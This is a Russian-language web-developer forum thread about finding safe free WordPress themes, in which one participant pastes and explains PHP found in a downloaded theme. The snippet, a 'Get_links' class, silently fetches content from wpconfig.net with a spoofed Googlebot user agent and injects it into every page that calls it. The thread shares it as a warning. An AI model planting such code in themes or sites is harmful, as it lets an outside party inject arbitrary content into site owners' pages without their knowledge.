Перейти к содержанию
Windakolit

Посоветуйте хороший бесплатный шаблон вордпресса

Рекомендуемые сообщения

Если можно, то отдельно под информационный статейник и отдельно под коммерческий проект по услугам:)

Я сам только покупал шаблон, к бесплатным у меня недоверие, что там могут быть всякие вирусы, зашитые ссылки и т.п., потому опыта в бесплатных нет

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

wp-templates.ru - здесь можете выбрать, что по душе. Я тоже сейчас как раз шабы ищу для сайта, хочется что-то минималистическое, но при этом адаптивное... А насчет бесплатного - зря,  шеллы и ссылки зашиты чаще в ломанные премиум шаблоны и рипы. А бесплатных шабов пруд пруди, можно устанавливать прямо из библиотеки вордпресс.

  • Повысить репутацию 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

@doctor_Joe благодарю за ссылку! А как в библиотеке вордпресса с русскими шаблонами, тоже есть? Я особо не искал, но мне казалось там их немного

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
В 17.04.2018 в 22:13, Windakolit сказал:

в библиотеке вордпресса с русскими шаблонами, тоже есть?

Вот этого не скажу, не в курсах. Но себе ставлю обычно любой приглянувшийся, допилить потом можно, если что.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Я обычно гуглю "вордпресс бесплатные шаблоны" или что-то в этом роде. Полно сейчас сайтов.

  • Повысить репутацию 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Себе ставлю прямо из библиотеки обычно, хотя ищу где попало.

Как раз хочу обновить дизайн блога, так что если есть интересные места с хорошими ссылками - делимся, не стесняемся :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
В 16.04.2018 в 10:29, doctor_Joe сказал:

wp-templates.ru - здесь можете выбрать, что по душе.

И через некоторое время получить вопрос "откуда лезет гадость"? :)

Код из первой скачанной темы:
 

error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_socket_timeout    = 5;

    function get_remote() {
        $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
        $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

        $links_class = new Get_links();
        $host = $links_class->host;
        $path = $links_class->path;
        $_socket_timeout = $links_class->_socket_timeout;
        //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',      1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                        "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context);
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
        return '<!--link error-->';
    }
}

 

  • Повысить репутацию 2
  • Спасибо 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
1 минуту назад, DOleg сказал:

Код из первой скачанной темы

А при установке через админку, из библиотеки вп?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Там лишнего быть не должно, это официальный репозиторий вп.

Изменено пользователем DOleg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Не зря я переживал по сторонним сайтам с шаблонами:)

@DOleg А что в этом коде не так? Я вижу что то со ссылками связано

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
11 минут назад, Windakolit сказал:

А что в этом коде не так?

При открытии страницы с вызовом данной функции, получает контент с конкретного адреса и выводит на вашем сайте.

var $host = 'wpconfig.net';
var $path = '/system.php';
...
$data = @file_get_contents('http://' . $host . $path, false, $context);
...
return $data;

Что там будет..? :)

Изменено пользователем DOleg
  • Повысить репутацию 2

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

@DOleg понял, теперь буду на такое обращать внимание. Правда бесплатных шаблонов пока не ставил, а в платных надеюсь такого быть не должно

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

@Windakolit , можете погуглить "class Get_links" или "function get_remote()", для понимания, в том числе и как очистить тему.

В платных тоже может быть всё, что угодно.

Жаль, после чистки ноута не могу найти ссылки на сайты с платными и чистыми темами в бесплатном доступе.

Изменено пользователем DOleg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ни разу не было никакой гадости в установленных из репозитория. Сайт, откуда скачивали, предлагает русифицированные шаблоны, но к репозиторию он какое имеет отношение? Никакого. 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
23 часа назад, DOleg сказал:

Там лишнего быть не должно, это официальный репозиторий вп.

Поэтому я ищу где попало, а устанавливаю только через ап.

14 часов назад, nadkhachaturova сказал:

но к репозиторию он какое имеет отношение? Никакого. 

Он в гугле на первых местах по запросам шаблонов, на нем часто ищу сами шаблоны. Не через библиотеку же их искать для просмотра)

  • Спасибо 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Только что, Sky-fi сказал:

Не через библиотеку же их искать для просмотра)

Это да. Но загружать все равно нужно из репозитория. 

  • Спасибо 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Только что, nadkhachaturova сказал:

загружать все равно нужно из репозитория

Так поступать стараюсь всегда со всем ПО, вордпресс просто не стал исключением. Тем более, для блогов бесплатных шаблонов хватает. Хотя, каюсь, пару премиум тем устанавливал по фтп :10_wink:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
В 17.04.2018 в 22:13, Windakolit сказал:

А как в библиотеке вордпресса с русскими шаблонами, тоже есть?

Есть и локализованные, и требующие небольших переводов. Но, помнится, у Гудвина можно купить недорого русифицированный шаблон, причем, без гадостей. Кроме того, он и поддержку осуществляет, если что-то пошло не так. Если интересно, ссылка http://www.goodwinpress.ru/

Ну, вот, нашла у Гудвина шаблон за 900 рублей. Правда, пока инспектировала демо вдоль и поперек, увидела 2 косяка, задала вопросы разработчику Алексею. Уже уточнил у меня информацию и пошел исправлять. Считай, готовый сайт. Цвета настраиваются. Добавляй свой контент - и вперед (хотелось бы, чтобы на деле было так). Для блогов есть и дешевле. Но для блогов мало кто покупает. 

  • Спасибо 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти


О проекте

Web@district это проект, который объединил специалистов из разных областей сайтостроения и интернет-маркетинга для того, чтобы пользователи этого ресурса могли удовлетворять свои потребности в знаниях, находить исполнителей, заказчиков или просто приятно пообщаться.

info@webdistrict.pro

Тут может оказаться каждый из вас.:)

логотип в футрере

Copyright © Web@District 2018      При копировании материалов с сайта активная гиперссылка ссылка на источник обязательна
×